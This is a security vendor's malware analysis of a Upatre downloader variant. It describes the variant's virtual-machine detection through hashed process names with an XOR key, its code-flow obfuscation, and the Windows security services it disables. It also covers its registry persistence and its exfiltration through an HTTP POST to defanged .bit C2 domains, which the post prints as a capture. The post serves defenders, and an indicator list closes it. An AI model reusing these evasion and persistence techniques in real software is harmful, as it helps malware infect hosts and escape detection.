# Upatre Continued to Evolve with new Anti-Analysis Techniques **[researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/](https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/)** Mike Harbison, Brittany Barbehenn July 13, 2018 By [Mike Harbison and](https://unit42.paloaltonetworks.com/author/mike-harbison/) [Brittany Barbehenn](https://unit42.paloaltonetworks.com/author/brittany-ash/) July 13, 2018 at 5:00 AM [Category: Unit 42](https://unit42.paloaltonetworks.com/category/unit42/) Tags: [dot-bit,](https://unit42.paloaltonetworks.com/tag/dot-bit/) [Downloader,](https://unit42.paloaltonetworks.com/tag/downloader/) [Namecoin,](https://unit42.paloaltonetworks.com/tag/namecoin/) [Upatre](https://unit42.paloaltonetworks.com/tag/upatre/) First discovered in 2013, Upatre is primarily a downloader tool responsible for delivering additional trojans onto the victim host. It is most well-known for being tied with the Dyre banking trojan, with a peak of over 250,000 Upatre infections per month delivering Dyre back in July 2015. In November 2015 however, an organization thought to be associated with the Dyre operation was raided, and subsequently the usage of Upatre delivering Dyre dropped dramatically, to less than 600 per month by January 2016. Today, the Upatre downloader tool is effectively no longer in use by criminal organizations. However, one of the many interesting aspects of the Upatre tool had always been its constant adaptive nature where the developers continuously added features and capabilities to the tool to increase its efficacy. In March 2018, Unit 42 researchers collected a sample of Upatre which was compiled in December 2016 but at the time was largely undetectable by most automated detection systems . Because of this, we analyzed the sample to afford awareness to those interested in this malware and its evolution. This previously undocumented variant features significant code flow obscuration, a pro re nata means of decryption for network communications, and of particular interest, the method in which this variant evades virtual machine detection. In this post we highlight these techniques identified during our analysis. Malware Overview Upatre is a stage-0 malware, which basically means it’s a downloader. The malware is used to download and install a payload onto the affected system. The payload is retrieved from hardcoded domain(s) and is typically another piece of malware. Historically, [Upatre has acted as a downloader for malware families such as Dyre,](https://www.symantec.com/security-center/writeup/2014-061713-0826-99) [GameOver Zeus,](https://www.us-cert.gov/ncas/alerts/TA16-091A) [Kegotip, Locky, and Dridex to name a few.](https://securityintelligence.com/the-necurs-botnet-a-pandoras-box-of-malicious-spam/) However, in this case no payload was delivered. Additionally, variants such as this one collect information from the target and transmit the data via an HTTP POST request. This newly observed variant comes packed with several characteristics and capabilities that stood out to us during analysis. Attributes in the PE header suggest that the malware is written in Visual C++ and several of the PE sections have high entropy classification, which indicates that the binary is packed. The PE resource section also contains images of Google Chrome, so when the binary is placed on the target machine, it appears to be that of the Google Chrome web browser. One of the key features about this variant that stood out during our analysis is how it detects whether or not it is running within a virtual machine. Although virtual machine detection is anything but new, in this variant, it is handled a bit differently than other samples previously analyzed by Unit 42. To, evade detection, the newly observed variant enumerates the running processes on the host, generates a CRC32 hash of the process name, performs an XOR with a hard-coded key of 0x0F27DC411, and finally compares the newly computed value against a list of values stored in an array within the code. We observed the following values: 0x6BA08023 0xDFF859A5 0x9649C9DF 0x91B88065 0xF663B61C ----- 0xC6E1589A 0xC63B2FDF 0xA9D475EF 0xCE9F7AE2 0xCF3B343A 0x85D3D4E6 0x1392D4C 0xDFC3A97E 0x51ACC655 0xEF0F2980 0x64EEAFAF 0xD5F11B49 0xC9823C94 0x9F4EE7C8 0x403C2A93 0x6A50A975 0xECCCD158 0xED3CF80E 0x209202D5 0x2C6668C3 This version of Upatre will not transmit any data via HTTP POST to any of the target domains if one of these values is found. In the event one of the values are found, the malware will sleep for six seconds and then will restart the entire check again. We were unable to determine every corresponding process name from the CRC32 list above, however, we were able to decipher the following process names: Process Name CRC32 vmtoolsd.exe 0xD5F11B49 vmacthlp.exe 0x403C2A93 Python.exe 0x209202D5 Other notable functionality of this new version of the Upatre malware includes: In-memory loading of code Disables the following Windows services: Windows Security Center Internet Connection Sharing Windows Firewall Windows Defender Windows Update Windows Defender Network Inspection Service Disables Windows security notification balloons on Windows 7 and up Disables Internet Explorer Phishing Filter Disables Windows User Access Control Notifications Launches a trusted Windows application msiexec.exe and injects code into its memory space using an undocumented technique Heavy use of obfuscated and optimized code to thwart code analysis Use of non-essential Windows API's for stack pivoting to mask intended API Multiple layers of custom encoding used for individual strings decoding. Does not share encoding routine with other encoded values Network Communication Another feature of this sample is the use of top level domains (TLD) of. bit. The intended domains are encrypted and only decrypted when the malware is ready to use them. This new sample attempts to resolve two domains, bookreader[.]bit and doghunter[.]bit via the following hardcoded DNS Servers: 31.3.135[.]232 193.183.98[.]154 5.135.183[.]146 84.201.32[.]108 185.133.72[.]100 96.90.175[.]167 104.238.186[.]189 DNS resolution for .bit domains use hardcoded DNS servers and is handled via TCP versus traditional UDP. This is because .bit domains are based on Namecoin and aren’t regulated by ICANN. Additionally, the hardcoded DNS server IPs we identified in this sample are all associated with OpenNIC Public DNS servers. According to [OpenNIC, when using OpenNIC DNS servers .bit domains are resolved through centralized servers that generate a DNS](https://wiki.opennic.org/opennic/dot/bit) ----- zone from the Namecoin blockchain; therefore, the secure nature of using Namecoin as a decentralized means of DNS is not actually being utilized here. If domain resolution is successful, the malware will then perform an HTTP POST request similar to the following: 1 2 3 4 5 6 7 8 9 POST / HTTP/1.0 Host: bookreader[.]bit Content-Length: 1024 Þm á9,9r.@¿æ[." Š?.àì..Cl„8f·Ö'LsÃøPi;±›hÏÀ¨*-2IóÙ4²R–k"à{..rè!..~5¹ qr^.¡h•âÔ?ý.ˆ¬–À$.Ÿ?óa..r(ì ÑÖ¹Û.Î.·‹ÅE.ûÉn¯&{qûÿ ´©Ø.öî",.YÒ!p†³3jÓ_sÐ.Páu».. KŠ†ÐïwÂ:š.¦Ú÷€âC naH¾Û.½†¸q.TJ7.¾šB' ?.®îîGHxãGd\¦jæµ.jGæûsðá].8®.Ï.X#8ç.Ô< ¹6ߎÄ. .ù..€¬«ˆ@æ_t.,á.‡q.Ô¤.'³åÿW·äZ.ìa:©"ïIãÌ. ¤ô~œ ïÒ§vBå|Ù«Ìfa.„{7Œìt.˜l_.ŒKNEÏg'¸O‹¯IWy.²«• Ú…•j'Û'Š.b.t‡|Å..Œn†´ÕK¨‰»%ðfh Eºw*¤šf‰Ò2š'¥V..qZÖ(«86ç ˜W©g†ÕËÖ™."Í.Õüþs8Ts½.=Ö\ókÌäE¨Ë†>¡¾ü\±ˆbÂï>;9.Ã'ØœZuá©:=ÇTx˜ufýÉg.÷.Šâ >.Èq.Ó9wnÖ.Ö[aöÝÇé1.Ÿ†HÁè– ¡>EhÂÙ.9©!©t ."`éh.™^).ž½C.,º3õnØÑÙéîN0`-°[1×ß(J.ÃwXô`¥Ø÷²';B1/¤¤+wTg›¾Qf-ß.ÿ"|fßX.,ãAÝêâºøbËe¾8X.0‡h… i9ÊŸF÷~GÞ =..Œþj'>Ž.°øô."U„ ÖóÙæ¯'s.O/oŒØã‰sœàá‡.Ø2ú{Œ»êt»§hé±.Z#r.é.<ýj®½Ü¡\(.….%ñŽËj..œ.¶ Dì"®Ñ2xf4+ÀŒÖföUv•ê\.äÓó¢Íéô¥. „¦©V…–3×.Y.ŒÔm8ò@†.~b«Ñ—..JW/éé.eE.Ó.¬† 89.E(=áø"¿.>ø»¾åêŠ.¬2©Áä¬xýËù<š.Ð.;éàE‰+&xAEç>"@LpßÇ¢7ãÔÞ@~Âfß+Z±*òF=aWÂÖµÐe_ëƧë&`|.>VøÂá.C7ñ‚¯iÚ.µ. ´)!Ϫ.ÇyO[‹¾?Js¨e jKß±¯Z].613ŒÐ.|XÝõÿÊý;nU0Mw‚M»«½:Û?/æ.$)¶ì_X.p.q.8.Ÿj€¬.œàï..B·âoŽM.êÅb¥8aÕù©s$ÏmhT£»¤/wwÆ6 y=€ƒÖG™Úu yÍƲ".® !BùìâÃ.=¦6<)º 5M´yótI\ Note, the HTTP POST does not contain any User-Agent strings. At this time, we don’t fully understand the encryption method; however, we know that the data sent in the POST request is encrypted using a custom encryption algorithm. Below is an example of data captured prior to encryption: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000010 00 00 00 00 60 00 00 00 00 00 00 00 01 00 00 00 ....`........... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 11 27 00 00 00 00 00 00 20 00 00 00 20 00 00 00 .'...... ... ... 00000040 57 49 4E 2D 52 49 38 38 4C 38 56 4D 45 38 4D 5F WIN-RI88L8VME8M_ 00000050 45 35 33 32 36 34 38 41 37 36 31 46 34 43 35 41 E532648A761F4C5A 00000060 AB AB AB AB AB AB AB AB 00 00 00 00 00 00 00 00 ««««««««........ 00000070 8B BB 9F 39 09 63 00 00 30 28 31 00 08 21 31 00 ‹»Ÿ9.c..0(1..!1. 00000080 EE FE EE FE EE FE EE FE EE FE EE FE EE FE EE FE îþîþîþîþîþîþîþîþ 00000090 EE FE EE FE EE FE EE FE EE FE EE FE EE FE EE FE îþîþîþîþîþîþîþîþ 000000A0 9F BB 9C 2E 00 63 00 18 70 1B 31 00 60 21 31 00 Ÿ»œ..c..p.1.`!1. 000000B0 78 1B 31 00 68 21 31 00 70 21 31 00 80 CF 2B 00 x.1.h!1.p!1.€Ï+. 000000C0 00 00 1D 74 8D 12 1D 74 00 70 00 00 3C 00 3E 00 ...t...t.p..<.>. 000000D0 38 20 31 00 14 00 16 00 60 20 31 00 04 40 0C 00 8 1.....` 1..@.. 000000E0 01 00 00 00 B0 A6 BA 77 BC 38 28 00 43 DB 5B 4A ....°¦ºw¼8(.CÛ[J 000000F0 00 00 00 00 00 00 00 00 F8 1F 31 00 F8 1F 31 00 ........ø.1.ø.1. 00000100 00 20 31 00 00 20 31 00 38 23 31 00 90 20 31 00 . 1.. 1.8#1.. 1. 00000110 54 05 B4 77 00 00 D9 3F D5 8A 48 B8 82 D1 D3 01 T.´w..Ù?ÕŠH¸‚ÑÓ. 00000120 AB AB AB AB AB AB AB AB 00 00 00 00 00 00 00 00 ««««««««........ 00000130 86 BB 9C 37 14 63 00 1A 43 00 3A 00 5C 00 57 00 †»œ7.c..C.:.\.W. 00000140 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 i.n.d.o.w.s.\.s. 00000150 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 y.s.t.e.m.3.2.\. 00000160 57 00 49 00 4E 00 4E 00 53 00 49 00 2E 00 44 00 W.I.N.N.S.I...D. Obscuring Code Flow This version of Upatre contains significantly obfuscated code to increase the difficulty of analysis. Figure 1 below shows an example API call disassembled in IDA Pro. _Figure 1-IDA Disassembly of API call_ ----- [For conventional naming, the function at address 0x00137ED6 has been renamed to the Windows API RegQueryValueEx_0.](https://msdn.microsoft.com/en-us/library/windows/desktop/ms724911%28v=vs.85%29.aspx?f=255&MSPPError=-2147217396) According to MSDN this function takes six parameters, the frame pointer is ESP based and the stack frame would resemble the following: _Figure 2-Inside Func_RegQueryvalueEx_0_ In the above figure, Func_RegQueryValueEx_0 is EBP based and performs the following: Saves the current stack pointer in EBP The stack pointer is adjusted 268 bytes (thwarting stack frame analysis) Pushes a pointer, which points to the REGKEY string After the call into sub_140CBE the stack would resemble the following: _Figure 3--Inside Sub_140CBE_ Function Sub_140CBE does the following: Pushes 0x13 on the stack Calls another function, which ends up jumping into the Windows API GetSystemMetrics ----- 0x13 is the SM_CSURSOR index used by GetSystemMetrics, which returns the width of a cursor in pixels. Retrieving this value has **no bearing on the program as the return value is not used.** How the stack looks after the call to func_GetSytemMetrics _Figure 4--Inside Func_GetSystemMetrics_ Some interesting observations about this function: The JMP instruction is used versus the CALL instruction as JMP doesn’t affect the stack. The two PUSH instructions are junk values and only used to pivot the stack, so the correct return address is on the stack during the return. Here is how the stack looks prior to the jump: Return address 0x001414FD is the address that is used to open and query the hosts registry, and this is the target address after executing the above instructions. The return code flow is as follows: 1. The two junk data values pushed on the stack are cleared during the executing of the GetSystemMetrics API. 2. The stack pointer is incremented past 0x13 3. Address 0x00140CC5 has a retn instruction 4. Address 0x001414FD is now on the top of the stack and the section within the malware that handles Windows registry enumeration is called (RegQueryValueEx). This stack pivot is performed entirely to make static analysis of the file more difficult, but the end result is still that the API function executes, and the malware accomplishes its task. Persistence Technique To establish persistence, this new version of Upatre creates the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ ----- String value x$msbuild where x$ is a random alpha character. Note: the name of the binary depends on the executable that is _running. The stub program grabs the Windows name of the EXE and prepends it with a random value._ Data -->C:\ProgramData\MSBuild\x$exe File x$MSBuild.exe is then copied to the host's C:\ProgramData\MSBuild folder. Conclusion In our data, we have observed over 119,000 unique malware samples that use dot-bit (.bit) domains for C2 infrastructure as early as 2014. Malware families observed include Necurs, GandCrab, Vobfus, Tofsee, Floxif, Ramnit, and several others. Due to the C2 domains being down at the time of our analysis, which was unsurprising given the potential age of the sample, we were never able to capture the ultimate payload for this new Upatre variant. However, open source analysis on this variant identified another sample configured with the same dot-bit domains. The sample, 94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83, was compiled six days after our Upatre sample and delivered the Chthonic banking trojan via RIG exploit kit. Although the delivery mechanism was not observed during our analysis, Upatre typically arrives via an email link/attachment or through a compromised website. **Defending Against this Threat** The Upatre malware is constantly changing and is capable of downloading many different malware families, some, destructive. Using threat detection and prevention solutions such as the Palo Alto Networks next-generation security platform are highly recommended as part of a proactive cyber security strategy. WildFire and Traps both detect the samples described in this report as malicious. Not all dot-bit domains are malicious, but organizations should take steps to ensure they can control access to all potentially malicious domains. Blocking outbound access to DNS servers and re-routing DNS requests to internally controlled DNS servers can help protect a network from malware using dot-bit domains provided by the Namecoin network. [Palo Alto Networks customers remain protected from Upatre and can identify this threat using the Upatre tag in AutoFocus.](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Upatre) **Indicators of compromise associated with this analysis include:** **Upatre** SHA256: 8ac7909730269d62efaf898d1a5e87251aadccf4349cd95564ad6a3634ba4ef4 **Cthonic** SHA256: 94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83 **C2s** Domain: doghunter[.]bit Domain: bookreader[.]bit IP Address: 31.3.135[.]232 IP Address: 193.183.98[.]154 IP Address: 5.135.183[.]146 IP Address: 84.201.32[.]108 IP Address: 185.133.72[.]100 IP Address: 96.90.175[.]167 IP Address: 104.238.186[.]189 Updated on 7/13/2018 to clarify that the Upatre sample discussed was compiled in 2016 but is newly discovered in 2018 and to more clearly identify samples with their hashes. **Get updates from** **Palo Alto** **Networks!** Sign up to receive the latest news, cyber threat intelligence and research from us [By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/terms-of-use) -----